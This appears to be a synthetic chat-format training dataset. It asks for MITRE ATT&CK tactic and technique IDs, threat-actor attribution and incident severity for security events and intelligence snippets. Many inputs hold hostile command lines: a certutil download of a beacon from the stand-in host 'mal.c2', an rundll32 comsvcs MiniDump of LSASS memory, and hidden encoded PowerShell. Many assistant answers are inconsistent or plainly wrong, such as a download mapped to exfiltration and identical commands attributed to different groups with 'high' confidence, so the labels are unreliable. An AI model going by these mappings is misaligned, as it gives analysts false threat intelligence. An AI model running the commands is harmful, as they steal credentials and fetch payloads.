messages
listlengths
2
2
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.173.11.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0004\", \"TA0005\"]...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: COM and execution in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021.003\", \"T1021\"]}", "role": "assistant" } ]
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Naikon has used WMIC.exe for lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1768 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.3.31.140", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"tec...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-VSQY50JY39)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Initial Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-2NGF6WCT45)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"sever...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T149...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Donut includes subprojects that enumerate and identify information about Process Injection candidates.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" }...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Example network shares include C$, ADMIN$, and IPC$.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.002\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients."...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Another batch script run by a scheduled task renames the archives on the file server (see Figure 15)", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T105...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Smoke Loader downloads a new version of itself once it has installed.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.3.161.86", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.42.38.39", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-68UMY6T44Q)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Command and Control, Lateral Movement", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.144.250.11", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"TA0009\"],...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-JKOZB6EC15)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Reconnaissance", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2619 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.178.106.80", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-IKUTM78X3V)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery, Collection, Reconnaissance", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 953 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High\"}", ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.35.129.163", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\"], \"techniqu...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\",...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1595\", \"T1595.00...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T160...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3185 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.92.19.34", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-P4M6962WG9)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Impact", "role": "user" }, { "content...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This is very similar to Thread Local Storage but creates a new process rather than targeting an existing process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-230EPXHTTF)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Discovery, Collection, Execution", "role": "user" }, { "content": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2456 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.59.216.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0010...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).", "role": "user" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-0HTB892YMP)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Initial Access, Collection", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3378 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Fox Kitten has used valid credentials with various services during lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\", \"TA0004\", \"TA0005\"], \"techniques\": [\"T1078\"]}", "role...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.37.119.175", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1484...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1221 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1007 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FIN4 has used Tor to log in to victims' email accounts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1090.003\", \"T1090\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2027 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.99.110.113", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T157...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3194 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-J7KETN6FTQ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Collection, Defense Evasion", "role": "user" ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2721 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.148.4.251", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-0TVKEW4ZYB)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Collection", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries).", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2341 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.170.90.175", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0040\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1485 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.151.150.118", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0006\"], \"techniques\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-KVIEWETYF7)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Credential Access", "role": "user" }, { "cont...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RDAT can use email attachments for C2 communications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.003\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.38.104.214", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3091 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.133.169.238", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.25.25.124", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\", \"TA0011\"],...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.4.18.198", "role": "user" }, { "content": "{\"tactics\": [\"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: collect + keychain in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.001\", \"T1555\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT37 has sent spearphishing attachments attempting to get a user to open them.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204.002\", \"T1204\"]}", "role": "ass...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2462 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-WP0325XZD3)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Collection, Execution, Privilege Escalation", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.60.122.242", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0004\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-WP6UU9XAJZ)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"sev...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-WE48TQS8X8)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence, Execution, Discovery", "role": "user" }, { "conte...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.88.168.141", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Japanese Tech Company Taiwanese Government Organizations Organizations in the Asia-Pacific Region that are of Interest to China The WATERSPOUT backdoor was written to the same file path as the HIGHTIDE backdoors: C:\\DO...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 864 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.194.35.97", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ProLock can use WMIC to execute scripts on targeted hosts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.168.32.139", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: StrongPity has used HTTPS over port 1402 in C2 communication.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1571\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.175.82.117", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0043\"], \"techn...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-84Q4DEA3GN)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access", "role": "user" }, { "content": "{\"s...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor these custom elements in service provider access logs to detect any anomalous requests.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.002\"]}", "r...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may install malicious components to extend and abuse server applications.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1505\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ZLib creates Registry keys to allow itself to run as various services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\", \"T1543\"]}", "role": "...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3256 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2558 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1093 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-B3ISJXLG1S)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Extrem...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2150 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.160.116.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2970 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-T8IP68IJC4)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Command and Control, Lateral Movement, Defense Evasion", "role": "user" }...